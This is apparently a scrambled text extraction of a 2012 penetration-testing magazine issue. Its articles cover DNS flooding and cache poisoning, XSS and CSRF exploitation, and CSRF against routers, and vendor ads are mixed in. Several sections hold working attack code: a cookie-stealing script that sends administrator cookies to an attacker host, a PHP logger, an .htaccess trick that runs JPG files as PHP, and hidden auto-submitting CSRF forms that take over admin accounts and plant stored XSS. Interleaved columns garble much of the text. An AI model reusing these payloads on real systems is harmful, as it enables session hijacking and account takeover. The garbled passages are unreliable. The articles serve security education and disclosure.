ns=<DNSRR rrname='rs.' type=SOA nhostmaster\xc0-w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\ Finished to send 1 packets. Finished to send 1 packets. Received 1 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=118 id=27937 flags=DF frag=0L ttl=126 proto=udpchksum=0x59e7 src=10.123.11.2 dst=10.123.21.119 options=[] |<UDP sport=domain dport=42090 len=98 chksum=0xecab |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode= qd=<DNSQR qname='e0qysndm.example.rs.' qtype=A rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x1d\ x00$\xea\x00\x00\x00*0' |>ar=None |>>> 2 ponlj.example.rs Begin emission: * name-error qdcount=1 ancount=0 nscount=1 arcount=0 qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA nhostmaster\xc03w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\ .Finished to send 1 packets. 01/2012 Page 89 http://pentestmag.com ATTACK 3 – Name Error – Meaningful only for responses from an authoritative name server, this code signifies that the domain name referenced in the query does not exist. 4 – Not Implemented – The name server does not support this requested kind of query. 5 – Refused – The name server refuses to perform the specified operation for policy reasons. QDCOUNT – an unsigned 16 bit integer specifying the number of entries in the question section. Set this field to 1, indicating one question. ANCOUNT – an unsigned 16 bit integer specifying the number of resource records in the answer section. Set this field to 0, indicating that not providing any answers. NSCOUNT – an unsigned 16 bit integer specifying the number of name server resource records in the authority records section. ARCOUNT – an unsigned 16 bit integer specifying the number of resource records in the additional records section. Listing 2. Tcpdump output tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes 15:33:50.292083 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 61) ws003.local.10385 >dns.company.com.domain: [udp sum ok] 0+ A? 2dat.example.rs. (33) DNS Request Flooding As I mentioned above DNS use UDP queries for name resolution. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block as they are highly spoofable. A DNS flood works by sending large number of rapid DNS requests, flooding the server with an amount of traffic that it can’t handle so that the performance of the server drops for legitimate requests. Scapy is a a packet manipulation program that can forge requests and send them to a specified host. Below I show how it can be used in a DNS flooding attack (Listing 1 abd Listing 2). DNS Response Flooding In this attach a client or name server, floods a name server with requests for records for which the server is authoritative, using a spoofed source IP address. This results in the flooding of the target network – the network associated with the spoofed IP address – with DNS responses to requests never issued from that network (Figure 2). 15:33:50.296174 IP (tos 0x0, ttl 126, id 27935, offset 0, flags [DF], proto UDP (17), length 114) dns.company.com.domain> ws003.local.10385: [udp sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0 10800 3600 2419200 10800 (86) ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 15:33:50.296217 IP (tos 0xc0, ttl 64, id 17068, offset 0, flags [none], proto ICMP (1), length 142) port 10385 unreachable, length 122 [DF], proto UDP (17), length 114) ws003.local >dns.company.com: ICMP ws003.local udp IP (tos 0x0, ttl 126, id 27935, offset 0, flags 15:33:50.292865 IP (tos 0x0, ttl 64, id 41127, offset 0, flags [DF], proto UDP (17), length 70) ws003.local.37817 >dns.company.com.domain: [udp sum ok] 10990+ PTR? 2.11.123.10.in-addr.arpa. (42) 0, flags [DF], proto UDP (17), length 102) 15:33:50.293051 IP (tos 0x0, ttl 126, id 27933, offset dns.company.com.domain> ws003.local.37817: [udp sum ok] 10990* q: PTR? 2.11.123.10.in-addr.arpa. 1/0/ 0 2.11.123.10.in-addr.arpa.PTR dns.company.com. (74) 0, flags [DF], proto UDP (17), length 72) dns.company.com.domain> ws003.local.10385: [udp sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 15:33:50.339515 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 65) ok] 0+ A? e0qysndm.example.rs. (37) ws003.local.42090 >dns.company.com.domain: [udp sum 10800 3600 2419200 10800 (86) 15:33:50.293235 IP (tos 0x0, ttl 64, id 41127, offset ws003.local.54183 >dns.company.com.domain: [udp sum ok] 35417+ PTR? 119.21.123.10.in-addr.arpa. (44) 0, flags [DF], proto UDP (17), length 159) 15:33:50.293629 IP (tos 0x0, ttl 126, id 27934, offset dns.company.com.domain> ws003.local.54183: [udp 15:33:50.343398 IP (tos 0x0, ttl 126, id 27937, offset 0, flags [DF], proto UDP (17), length 118) dns.company.com.domain> ws003.local.42090: [udp sum ok] 0 NXDomain q: A? e0qysndm.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 10800 3600 2419200 10800 (90) sum ok] 35417 NXDomain* q: PTR? 119.21.123.10.inaddr.arpa. 0/1/0 ns: 21.123.10.in-addr.arpa. SOA 86400 3600 (131) dns.company.com. hostmaster.alcoyu.co.yu. 3325 900 600 01/2012 Page 90 http://pentestmag.com one is flooding the target name sever with recursive DNS requests and the other is to attack responsible authoritative name server with DNS request flood. Figure 2. DNS Response �ooding Recursive Request Flooding This attack consists of an attacker flooding a target name server with DNS requests, for records for which server is not authoritative. This action has two effects, This form of attack could also be called DNS Registration Attacks. To take ownership of domain it is necessary to register at the appropriate Internet registrar, provide the domain contact information, and ensure that the Generic Top Level Domain servers (GTLDs) are updated with the appropriate name server information. It is possible to fake the DNS registration or to change registration details. If the attack is successful and DNS registration records are updated, the attacker can make a “rouge” DNS server and direct clients to fake web sites and mail servers. This attack is preferable for “phishers” because the user is unaware of the fraud. DNS registration bodies involved several protection controls to avoid DNS domain hijacking to authenticate registration requests. • • • Comparison of e-mail addresses in the mail header and Mail-From field in mail is one example. Encrypted contact supplied password in database for authentication of registration requests is another. The use of PGP keys for signing registration modification requests. Exploiting the DNS Trust Model – Domain Hijacking Cache Poisoning Figure 3. DNS Cache poisoning Very often DNS server are configured to search for records in their cache as primary sources and then to search zone file data. From an attacker’s perspective it is easier to compromise cache on a name server than to manipulate zones. A cache poisoning attack can be combined with DNS spoofing attack. By spoofing a counterfeit response to a DNS query, an attacker can remotely update server cache data. When high value of TTL (Time To Live) is returned by an attacker along with spoofed record data, the response data will be cached by the local name server for considerable period of time. This will have Page 91 01/2012 http://pentestmag.com com. the attacker contacts the company’s DNS server to check for the domain name for answer. is to deface the corporate Web page for the victimco. it will make DNS query to root the name server to lookup IP address for answer. Each replay will have a different transaction ID integer. This query contains the random Transaction ID integer. for example. that look like the DNS reply expected but it contains the In this kind of attack the attacker tries to “hijack” part of the DNS name space by compromising an upstream server or by submitting a fake name server registration change to the Internet register.com @comapnie.com or submit fake request for change on Internet register and become able to change records for answer. the attacker starts an attack which floods the company’s DNS server with manually crafted packets. What can make this attack even more efficient is to start DDoS to authoritative DNS server for www.com wrong IP address. this will increase the chance that an attacker will predict transactional ID integer (Figure 3). DNS Hijacking CISO at respectable �nancial institution in Serbia. https).com at the company’s DNS server. focused on pen testing techniques and methodology. This type of attack has a key benefit in that it does not require the direct compromise of any servers on the target organization’s network. http. This integer is supposed to be randomly generated. In first step of the attack. an integer that is sent with every DNS query. If the attacker’s intention. What makes DNS cache poisoning a difficult (or easy) exploit is the use of a 16-bit Transaction ID. Goal of cache poisoning attack is to feed the name server with false address (A) or name server (NS) records with high TTL value. At the same time. vulnerability assessment.answer. DNS Hijacking In the case that there wasn’t a recent request for answer.com domain. If the transactional ID integers used by companies DNS are predictable.com. An attacker can compromise a server which contain the records for answer. In diagram below attacker will try poison cache of Company DNS server for domain answer.com with the command: root@bt#dig answer.com and place in its cache the fake IP address. It is important that the replies by the attacker reaches the company’s DNS server before the legitimate replies. the attacker can effectively achieve this by leveraging a DNS hijacking attack to redirect Internet Web clients to a new site containing a revised set of Web content (Figure 4). the attacker have better a chance to fake the demanded IP address.u ALEKSANDAR BRATIC Figure 4.com . 01/2012 Page 92 http://pentestmag.com. The company’s DNS will use the first reply which appears legitimate by checking transactional ID integer.com and redirect addressed to legitimate answer. to affect client and server redirection or Internet denial-of-service. incident handling process and risk mitigation.com to fake servers which can run different services (mail. the attacker expects that one of these fake replies will match the transaction ID in query sent by company’s DNS.ATTACK an impact on all clients in same network. After this step attacker can hijack domain answer. . Many XSS examples use alert(1) or alert (/XSS/) as a payload but this fails to show the power of XSS vulnerability. In this article.g. I n a penetration test. Shell of the Future – XSS Exploitation Tool Shell of the Future is a Reverse Web Shell handler. and visual: the alert box. the XSS issues are typically demonstrated with a script function that is short. or even conduct other malicious activity. It can be used to hijack sessions where JavaScript can be injected using XSS or through the browser’s address Figure 1. the author will show you how to exploit XSS vulnerability (e. session hijacking) using Shell of the future.com . Architecture of Shell of the future (Source: http://www. authentication credentials.XSS & CSRF XSS Using Shell of the Future Cross-site scripting (XSS) vulnerabilities in an application potentially allow an attacker to execute malicious script on other users’ systems and hence compromise their sessions.html) 01/2012 Page 94 http://pentestmag. This can occur if HTML or script can be written to an application data store and be retrieved by other users. or if an attacker can coerce a victim into clicking on a malicious link.org/tools/sotf/sotf. and may lead to a so what? reaction from developers not familiar with such a vulnerability.andlabs. simple. charismathics. unparalleled convenience for digital identity management.com . pre-boot systems and TPM iEnigma® the software application that turns your smart phone into a PKI smart card.com www. micro SD card.smart security interface© the multiplatform security connector integrated with all major PKI applications and TMS platforms. soft token. corporate and bank projects. management of ������������������������������������������������������������������������������ TMS infrastructure contact: team@charismathics. it fully supports all wide spread smart cards and architectures for government. it also interfaces with smart phones. smart card. also in combination ���������������������������������������������������������������� CSTC® PKI made simple and accessible to SMB: card initialization. unbeatable security thanks to the support of NFC chips and micro SD cards plug´n´crypt® the product line for logical and physical access control covering different form factors: USB token. ) This page can be hosted on a local apache server and visited in a web browser. In practical terms.”[1].com/transfer_funds. CSRF was used to great effect by PDP Architect/Gnu Citizen in a series of attacks against particular makes of home router [2].1. http://pentestmag. all I have to do is insert <img src=”http://www. their browser will make a request to the bank that is indistinguishable by the bank from the user making that same request themselves. In other words.1 0=31&1=&30=PASSW0RD Now as an attacker.168. but it is functional and will serve for a proof of concept.0. http://www. As a more concrete example. depending on who is writing about it. the vulnerability can be mitigated by checking for Referer headers. In this case. Why is it an issue? Firstly. the application does not always check whether a request came from a user click. however this check can be circumvented if there are Cross-Site Scripting problems present in the same site. The worst-case scenario is a naive implementation of a banking website which would transfer funds when the user is logged in by the use of a script with several GET parameters. I t is sometimes abbreviated as CSRF or XSRF. I know. and views another web page.php?to_ac count=12345678&to_sort=123456&amount=1000” width=1 height=1> Since we know the IP address defaults to 192.com/transfer_funds. or if it merely got invoked because of an img src=”” tag embedded in another page. Below is the example they give for changing the password.XSS & CSRF Cross-Site Request Forgery OWASP currently define Cross-Site Request Forgery as “an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated.php?to_account= 12345678&to_sort=123456&amount=1000 into a popular webpage and then the donations should start coming my way soon. for example Facebook and Gmail – if these didn’t implement proper protections then an attacker could cause email or comments to be posted as a particular user. It should cause a POST request of the above form to the given URL. if a user is logged into a web application. This vulnerability exists because the browser will automatically transmit the authentication or session cookie to the application with each request to that site. If anyone who is logged into that bank and views my web page. we can construct some javascript to issue such a POST request when this web page is viewed (Listing 1). POST /cgi/b/ras/?ce=1&be=0&l0=-1&l1=-1 HTTP/1. many people have many different web sites open at any one time.example.com 01/2012 Page 98 .example. (This isn’t great JavaScript. the second page can cause the user’s browser to initiate actions on the web application without the user being aware of what is happening. http://www. and Certified Ethical Hacker. and our training is the fastest.com . See how good and fun training can be. and Security for All ™ www. and your staff on top of the game. We give you online access to materials wherever you are. easiest way to master the relevant data you need NOW.ExpandingSecurity. We’ve been preventing deer-in-headlights look since 2006. Responsibility. We offer Pen Testing services plus our Live On Line training classes for ISSMP. We are Expanding Security. CISSP. Sign up for our free weekly PainPill and come to a free class.com/PainPill …with Freedom. your business strong.Get prepared. You need to keep your job secure. Our courses are current to changing technology.expandingsecurity. a Pen Testing and Training Company. ISSAP. our Research Lab assigns a medium risk level (for a standard XSS) to these vulnerabilities for the simple reason that the most efficient exploitation vector of XSS is carried out against website administrators. which remain a highly underestimated attack vector in the security scene. T his situation is probably aggravated by some misinformation websites and some selfproclaimed security experts. This case-by-case approach is paying off by vendor’s patch statistics for our Security Advisories: • • Only 32% of post-authenticated vulnerabilities were fixed during the first and second quarter of 2011. explaining that post-authentication vulnerabilities are dangerous and they should be fixed. such as Stored XSS in the administrator’s portion of a web application. as that has already been done many times before by others. as long as they impact webpages which do not remain available to unauthenticated users. For our example. We will not explain the basics of web application attacks in this article. One of the most popular post-authentication vulnerabilities is XSS (Cross Site Scripting). 65% were fixed during the third and fourth quarter of 2011. In the past year. We will focus on a practical way to exploit post-authentication XSS’s and CSRF. we will take an old version of Zikula. However. which is vulnerable to XSS against website http://pentestmag. Testing the Proof of Concept Let’s start with something very simple. The problem is that they simply do not understand the exploitation’s vectors of these vulnerabilities and they consider them as benign.com 01/2012 Page 104 . The goal of this article is to demonstrate the real danger of post-authenticated vulnerabilities. This type of vulnerability is a perfect attack against web-site administrators. High-Tech Bridge SA Security Research Lab has been performing vendor awareness on a non-profit bases. which try to deny disclosed vulnerabilities by posing them as a feature implemented by design. Post-authentication XSS Figure 1.XSS & CSRF XSS & CSRF Practical exploitation of post-authentication vulnerabilities in web applications These days many people do not consider post-authentication vulnerabilities dangerous. not against common users. despite the limited exploitation’s vector (against website administrators only). Actually. jpeg"> <iframe width="1" height="1" style="display:none" src="http://targethost/index.jpg. $_GET["c"]. Next we have to have the logged-in administrator to visit our hackhost website to steal his cookies. which will exploit the XSS vulnerability inside the admin panel.txt". which was publicly disclosed on High-Tech Bridge’s website: Figure 1. which is located at: http://hackhost/1. Let’s imagine that a malicious hacker has a website located at http://hackhost/. 01/2012 Page 105 http://pentestmag. This will make the malicious link that we are going to send to the administrator less suspicious. On the image below we see what the administrator will see after opening the link in his browser: Figure 2.php?c='%2Bescape(document. Indeed.htaccess file causes Apache to handle JPG files as PHP scripts.jpeg 288 2012-01-01 00:00 1. Several months ago. an invisible part in the victim’s browser will create an iframe. 4096 2012-01-01 00:00 . First of all let’s test the Proof of Concept (PoC) code from the advisory to make sure that the vulnerability exists.location .administrator vulnerability (details are described in our Security Advisory HTB23039). 1. fclose($f).txt file. the vulnerability was rapidly patched by the vendor. We have the following files: • The . we see the value of our cookie.htaccess AddType application/x-httpd-php ."\r\n"). The administrator receives a Birthday Card.jpeg is a normal JPG file with is used as a simple birthday card picture.com .cookie)</script>"> </body> </html> root@hackserver:/var/www/hackhost# cat c. and today we are going to demonstrate the full version of the exploit.jpg shows the 1. as if a website user (malicious hacker in reality) wants to wish a happy birthday to the administrator. However. c. root 277694 2012-01-01 00:00 1. we will use a very basic one.php <? $f=fopen("log.jpg root@hackserver:/var/www/hackhost# cat 1. ?> fwrite($f. as there are already plenty of social engineering attack examples on Internet. Here. 37 2012-01-01 00:00 .jpg <html> <body> <img src="1. XSS works perfectly. Now let’s see how this vulnerability may be exploited in practice.jpg 78 2012-01-01 00:00 c. the JPG extension will not seem suspicious to the majority of users. Listing 1..jpeg picture to simulate a simple image behavior. "a"). We log into Zikula as an administrator and test by using the proof of concept. Our vulnerable website with Zikula is located at http://targethost/.php?module=theme&type=admin&func=setasdefault&themename=<script>document.href='http://hackhost/c.php script simply writes received administrator’s cookie to the log.php 4096 2012-01-01 00:00 . we will not write a complex scenario. Content of web root of hackhost root@hackserver:/var/www/hackhost# ls -la drwxrwxrwx drwxrwxrwx 17 root -rw-rw-rw-rw-rw-rw-rw-rw-rw-rw-rw-rw1 root 1 root 1 root 1 root 2 root root root root root root • • • 1.htaccess root@hackserver:/var/www/hackhost# cat . txt Figure 4. Modifying admin cookie _zsid2=655085aceec73b6e3aacb230a344bc88f169c20d. details are described in our HTB22913 Security Advisory).XSS & CSRF Figure 2. as soon as the administrator opens the link. and go to the administration portion of the web site: Figure 5. Image displayed in browser As soon as the logged administrator sees this image. his Profile’s Client side attack through CSRF Another example of post-authenticated vulnerability is CSRF or XSRF. Here is what the exploited UseBB administrator will see when the link is opened: Figure 6. Now. which was also patched by the vendor several months ago. Let’s go back to the vulnerable http://targethost/ : Figure 3. his admin account is compromised. We have not logged into the system. so we do not have any rights. which was discovered in a previous version of UseBB (vulnerability Figure 3.11 of UseBB. To exploit this vulnerability.jpg. we now have administrator’s cookie. We are now logged-in as the Zikula administrator with full rights. Again. Lack of access Figure 5. We can see a new file named form.0. Let’s take the example of the CSRF vulnerability. Refresh the page with the new cookie enabled. we have to make a logged UseBB administrator visit our malicious image located at http://hackhost/1. which is coming from a forum member. However. As previously mentioned.com . Gain Access 01/2012 Page 106 http://pentestmag. using the FireCookie plug-in for Firebug in Firefox and use the intercepted Session ID of the administrator: Figure 4. Perfect. Our target will again be located at http://targethost/ with the vulnerable version 1. we will need a slightly modified version of our http://hackhost/ used in the previous XSS case. but it is a very common exploitation attempt for post-authentication XSS vulnerabilities. (Cross Site Request Forgery). which are quite often wrongly considered as benign by unaware people. Let’s come back to our hackhost and have a look on what we just received: root@hackserver:/var/www/hackhost# cat log. let’s modify our admin cookie.hml designed to perform CSRF exploitation. there is nothing here which really looks suspicious – this is simply a birthday card. This is a very simple example. 1 root root 4096 2012-01-01 00:00 ..jpeg 1109 2012-01-01 00:00 form.html"> <html> <body> <form action="http://targethost/panel.jpg <html> <body> <img src=1.jpg 4096 2012-01-01 00:00 .jpg root@hackserver:/var/www/hackhost# cat 1.1 root root -rw-rw-rw.html 38 2012-01-01 00:00 .submit().1 root root -rw-rw-rw.htaccess AddType application/x-httpd-php . </script> </body> </html> 01/2012 Page 107 http://pentestmag.Listing 2.1 root root 50935 2012-01-01 00:00 1.htaccess 118 2012-01-01 00:00 1. -rw-rw-rw.php?act=editprofile" method="post" name="main" id="main"> <input type="hidden" name="displayed_name" value="admin"> <input type="hidden" name="real_name" value=""> <input type="hidden" name="avatar_remote" value=""> <input type="hidden" name="birthday_day" value=""> <input type="hidden" name="location" value=""> <input type="hidden" name="website" value=""> <input type="hidden" name="birthday_month" value=""> <input type="hidden" name="birthday_year" value=""> <input type="hidden" name="occupation" value=""> <input type="hidden" name="interests" value=""> <input type="hidden" name="signature" value=""> <input type="hidden" name="msnm" value=""> <input type="hidden" name="aim" value=""> <input type="hidden" name="icq" value=""> <input type="hidden" name="email" value="hacker@hack. Files and their content in hackhost’s web root root@hackserver:/var/www/hackhost# ls -la drwxrwxrwx 2 root root drwxrwxrwx 8 root root -rw-rw-rw.host"> <input type="hidden" name="yahoom" value=""> <input type="hidden" name="jabber" value=""> <input type="hidden" name="skype" value=""> <input type="submit" value="OK"> </form> <script> document.com .jpeg> </body> </html> <iframe width="1" height="1" style="display:none" src="form.main. root@hackserver:/var/www/hackhost# cat . but it is a quite efficient proof of concept and the reason why this vulnerability was reported to the vendor. 1.php. because the vulnerable code does not perform any critical or sensitive actions. Getting new password Figure 9. who in turn agreed that it was a serious issue by providing a new release to his customers. Usually. because they may consider it useless. • Figure 7.php) in the e107 administrator panel. In a same way.jpg is a little bit more complex and performs 3 different actions: • • It shows a legitimate Happy Birthday image (1. Logging as UseBB administrator 01/2012 Page 108 http://pentestmag. a simple XSS in the script. Two seconds after loading form. script with stored XSS attack code (inserted in step 2). which exploits the CSRF vulnerability and adds new field with malicious Javascript code inside that steals the user’s cookie (this is possible because our script is vulnerable to XSS). is vulnerable to stored XSS. One of the script parameters named user_ include is vulnerable to Stored XSS. Now we simply need to use UseBB password recovery feature to get a new administrator password on hacker@hack. If developers miss an XSS somewhere. let’s have a look at a more complex exploit using a hybrid approach. we will use the CSRF and stored XSS vulnerabilities in the admin panel of e107. In this example.html. However in this case.jpeg) An invisible iframe is included in form.html. We will again consider that the vulnerable version of e107 is located at http://targethost/ and that the hacker’s server is located at http://hackhost/. content of which will be similar to our previous examples with classic post-authenticated XSS and CSRF.jpg will request the users_extended.host email: Figure 8. Sometimes. as in many others High-Tech Bridge’s advisories. This is a very simple example of CSRF. (Persistent XSS).html CSRF code. which relies on both XSS and CSRF. it may be true and sometimes not. the script would not represent a big value for hackers if it was only vulnerable to CSRF. In this case 1. In the present case. such as the password change that we used in our previous CSRF example.com . In this case. When CSRF combines with XSS Now. After receiving the administrator’s password by email. we can log as UseBB administrator: Figure 9. One of the scripts (users_extended. as if it was the real administrator who legitimately changed his email address by using the designed function of UseBB: Figure 7. and these vulnerabilities have also been fixed by the vendor. then they are faced with a cocktail. Suspicious Happy Birthday email will be changed to hacker@hack. Receiving the administrator’s password Figure 6. we have a perfect combination of XSS and CSRF together. This inaccurately makes some people believe that such a vulnerability is not dangerous at all. as well as to CSRF attacks. without the CSRF would be pretty useless from an attacker’s point of view. Details are described in our Security Advisory HTB23004. vendors do not implement CSRF protection in their administration scripts. which may open a door to full system compromise. The complexity is that the vulnerable field is edited and displayed on two different pages. the vulnerable script allows the website administrator to create a custom field for user profiles.host by our form.XSS & CSRF Figure 8. So let’s start exploiting it. .html <form method="POST" action="http://targethost/e107_admin/users_extended.txt".html 38 2012-01-01 00:00 .php <? $f=fopen("log. </script> </body> </html> root@hackserver:/var/www/hackhost# cat form. 846 2012-01-01 00:00 form. drwxrwxrwx 11 root root -rw-rw-rw-rw-rw-rw-rw-rw-rw-rw-rw-rw-rw-rw-rw1 root root 1 root root 1 root root 1 root root 1 root root 50935 2012-01-01 00:00 1.jpg 78 2012-01-01 00:00 c.com . 01/2012 Page 109 http://pentestmag. fclose($f).htaccess AddType application/x-httpd-php .getElementById('f1'). $_GET["c"].submit()."\r\n").php?c='+esca <input type="hidden" name="add_field" value="1"> pe(document.jpg <html> <body> <img src=1. ?> fwrite($f.htaccess root@hackserver:/var/www/hackhost# cat . A content of hackerhost web root root@hackserver:/var/www/hackhost# ls -la итого 80 drwxrwxrwx 2 root root 4096 2012-01-01 00:00 .src='http://targethost/e107_admin/users_extended.html'></iframe> setTimeout("document.jpeg> <script> <iframe width="1" height="1" style="display:none" id=f1 src='form.href='http://hackhost/c.cookie).jpg root@hackserver:/var/www/hackhost# cat 1. </script> root@hackserver:/var/www/hackhost# cat c.php'".jpeg 259 2012-01-01 00:00 1.2000).location.m.php 4096 2012-01-01 00:00 .</script>"> <input type="hidden" name="user_parent" value="0"> <input type="hidden" name="user_required" value="0"> <input type="hidden" name="user_read" value="0"> <input type="hidden" name="user_hide" value="0"> <input type=submit> </form> <script> <input type="hidden" name="user_applicable" value="255"> <input type="hidden" name="user_write" value="253"> document.php?editext" name=m> <input type="hidden" name="user_field" value="abcde1f1"> <input type="hidden" name="user_text" value="12121"> <input type="hidden" name="user_type" value="1"> <input type="hidden" name="user_include" value=""><script>document.Listing 3. "a"). We hope that this article will improve vendor and user awareness regarding the real dangers of postauthentication vulnerabilities though client-side attack vectors. As before. Unlimited access Conclusion The three client-side attacks described in this article show that post-authenticated vulnerabilities are also dangerous. which will store it in the log. do remain a target of choice in the real world. We now have access to all of the administrative functions and unlimited control of the e107. both XSS and CSRF vulnerabilities were successfully exploited.txt PHPSESSID=a688a485f2ddb7a5ce40610e58d686ce. ed1c0d5108d2a. e107 administrator’s cookie will be passed to c.XSS & CSRF Figure 10. XSS example root@hackserver:/var/www/hackhost# cat log. We would also like to highlight the efforts of Secunia. However. who educates a lot to vendor’s and user’s awareness about post-authentication vulnerabilities. e107_tdSetTime=1325883584. Also. They are far from being implemented by application design and may become an entry point on your system. Figure 12. web application security expert. we can now simply edit the cookie and refresh the page and you have exploited the administrator’s page! We are now logged as the e107 admin.txt file: Listing 4. despite highly underestimated on certain security websites and during most penetration tests. the administrator will not see any suspicious activities. Figure 11. u MARSEL NIZAMUTDINOV Marsel Nizamutdinov. Moreover. despite the fact they do not impact webpages available to non-authenticated users. e107_tdOffset=-8.php.com . e107cookie=1.jpg. except the Birthday Card: Figure 10. XSS and CSRF. Exploiting the administrator’s page 01/2012 Page 110 http://pentestmag.f1f19cd495328ce023b Here is our malicious link that a log e107 administrator whould open: http://hackhost/1. Dangerous Birthday Card Listing 4. e107_tzOffset=-240. As we have already seen in the XSS example. author of „Hacker Web Exploitation Uncovered” (2005). Head of Research & Development Department at High-Tech Bridge SA. . Read further for theoretical and real-world exploits on how this behavior can be abused.com Cookie: authenticated=yes While the name does say cross-site. The focus of this article will be around the php language. http://pentestmag. a markup language for forums) [11] to display images or movies in comments.com/img.1 Host: victimsite. This is possible by chaining other exploits like cross-site scripting (XSS). issues stem from how it handles same origins and authority.jpg. These vulnerabilities are easy to locate and perform attacks against whilst allowing an attacker to completely compromise an account and/or compromise the host.XSS & CSRF Discovering Modern CSRF Patch Failures Cross-site request forgery (CSRF/XSRF) vulnerabilities allow an attacker to perform authenticated actions without authenticating as the user.jpg” /> The authenticated cookie for victimsite is added by the browser when making the request for victimsite.jpg HTTP/1. Think about forums or blogs where you have the ability to upload avatars from a supplied url or use bbcode (bulleting board code.com and sees this image tag then it will grab this resource by making the appropriate request for the client. session cookies. +Local Vector When the user’s browser visits attacksite.com and victimsite. videos.com image scenario. I n particular. Some of the issues can not be fixed in browsers as the real problem is how web applications handle actions.com domain/origin. +Remote Vector The easiest way to exploit this issue is with cross-origin communication as seen with the previous section’s attacksite. The issue revolves around general browser architecture and its handling of the web origin policy [1]. Here’s how html would be used to grab an image from victimsite. or simply abusing any form of valid injection points.com 01/2012 Page 112 . This allows us to perform authenticated actions without ever having to authenticate ourselves.com/ img. Please re-read that section if you do not understand how a remote vector (different origin) would work. Assume the user is logged in with an authenticated=yes cookie.com’s origin: <img src=”http://victimsite. A stripped down request for this image is: GET /img. the vulnerability can be exploited in the context of the same origin and never require access to resources from another origin. This data is used when another domain makes a request for external resources like images. The problem is seen when the browser has stored authentication data for the victimsite. basic/ digest authorization depending on attack vector[8].com and load it in attacksite. etc. but csrf issues exist throughout other languages. Data such as credential cookies. which will be covered more later. and possibly other stored authentication data the browser manages. scripts. com Page 120 . second one allows an external attacker to manipulate the site’s functionality to increase his finances. Which belong to the class Cross-Site Request Forgery (WASC-09) [2].) to attacker’s wallet. which I happened to meet many times at different e-commerce sites. (i. Which I’ll tell you about in this article. The essence of such attack comes from conducting a CSRFattack on the user with the purpose of manipulation of his finances (and functionality of the site being used exactly as it was intended by its developers). Taking into account that Business Logic flaws logical vulnerabilities. there are also client-side ones. But besides server-side Business Logic vulnerabilities. by decreasing finances of the user of the site. etc. Which allows an attacker to manipulate financial data in web applications. There are two types of Business Logic flaws: serverside and client-side.XSS & CSRF Business Logic Vulne-rabilities via CSRF Cross-Site Request Forgery (CSRF) vulnerabilities can be used for different nasty things. Conduct second CSRF-attack on the user to initiate withdrawing of money (to wallet specified in the account).g. to change his wallet (e. And I have found both types of such vulnerabilities many times since 2005. In two steps scenario the attack will be the next: • • Send request to change the wallet: http://ecommerce/user?wallet=attackerwallet Send request to withdraw money: http://ecommerce/user_money?withdraw=1 http://pentestmag. because process of changing the wallet and withdrawal of money is divided into separate functionalities. which was not expected by its developers. PayPal.e. such as the ones used for online-banking. but the most dangerous one is stealing of money from users’ accounts. But if at a vulnerable site these two operations are joined into one functionality. 01/2012 Example of Business Logic CSRF Example of such vulnerability. abusing occurs of the functionality for withdrawing of money from a user’s account). WebMoney. First one allows the user of the site to manipulate the site’s functionality to increase his finances. The attack occurs at special using of functionality of the site. the scenario of the attack will be the next: • • Conduct CSRF-attack on the user. it’s manipulation with withdrawing of money to electronic wallets. A mong vulnerabilities found in web applications there are logical vulnerabilities such as Business Logic flaws. Usually two steps of the attack (two requests) are required. With the existence of CSRF vulnerabilities at the site. And the second type of these vulnerabilities is more widespread then the first one. then they belong to class the Abuse of Functionality (WASC-42) [1]. EPS and other ecommerce sites. then it’s possible to send one request – for withdrawal of money to a specified wallet. It is the server-side type. Attackers can DoS them. So attackers can conduct remote CSRF attacks on network devices. such as routers. which allow users to access the Internet. there are also vulnerabilities in the admin panels of different network devices. to do many different nasty things.XSS & CSRF CSRF Attacks on Network Devices Similar to vulnerabilities in web applications on web sites. when such devices resides in a LAN. are typically affected devices. especially CSRF. including Cross-Site Request Forgery (CSRF) vulnerabilities. that attacker will take control of the traffic – all traffic (such as DNS requests) will be send via his own server. allowing him to sniff confidential data and conduct phishing attacks on all users in a LAN who are using these devices to access the Internet. Let’s take a look at two attacks. Because it’s possible to setup these devices in such way. Callisto 821+ it’s ADSL Router (and similar vulnerabilities can be in all other devices from Iskra). Wi-Fi Access Points. Such vulnerabilities exist in different network devices. In the first scenario the attacker will conduct part of the actions remotely and part manually http://pentestmag. – from malicious local attackers or viruses – so developers should not leave their devices with remote or local vulnerabilities.). These can be attacked remotely via CSRF from the Internet.com Page 124 . The DAP 1150 is a Wi-Fi Access Point and router (similar vulnerabilities can be in all other devices from D-Link). D-Link DSL-500T ADSL Router and D-Link DAP 1150. Wi-Fi Access Points and others. which has computers with access to Internet (CSRF attacks can be conducted via the browsers of the users at these computers). etc. Which can be attack similarly to web sites – by attacking users who have access to these network devices. A lmost all network devices are vulnerable to CSRF [1] due to misunderstanding of this threat by developers of such devices. For external attackers the most interest represent such network devices as routers and other devices with router-functionality (ADSL modems. And by using CSRF attacks on these vulnerabilities the attacker can receive full control of these devices. such as Iskra Callisto 821+. disable different functionalities and change different settings. vulnerabilities in which I’ve found and disclosed at my site. Not mentioning that there is also a threat of local attacks 01/2012 Let’s see how real attacks can be conducted on example of Iskra Callisto 821+ and D-Link DAP 1150. But it’s not true. because they think that devices will reside in a LAN and will not accessible from Internet. For example routers and ADSL modems. Possibilities of CSRF Attacks on Network Devices Real attacks on Network Devices Developers of network devices don’t attend enough to security (vulnerabilities in such devices are found all the time). There can be different attacks created. which allows them to take devices under full control (and take control on the user\s’ traffic through these devices). which are very advantageous for the attackers. an attacker may be able to read database contents or even write to the database. Once you have executed the program.com . Figure 1. Enables easy transport of logging data – All of the data gathered from NTO SQL Invader can 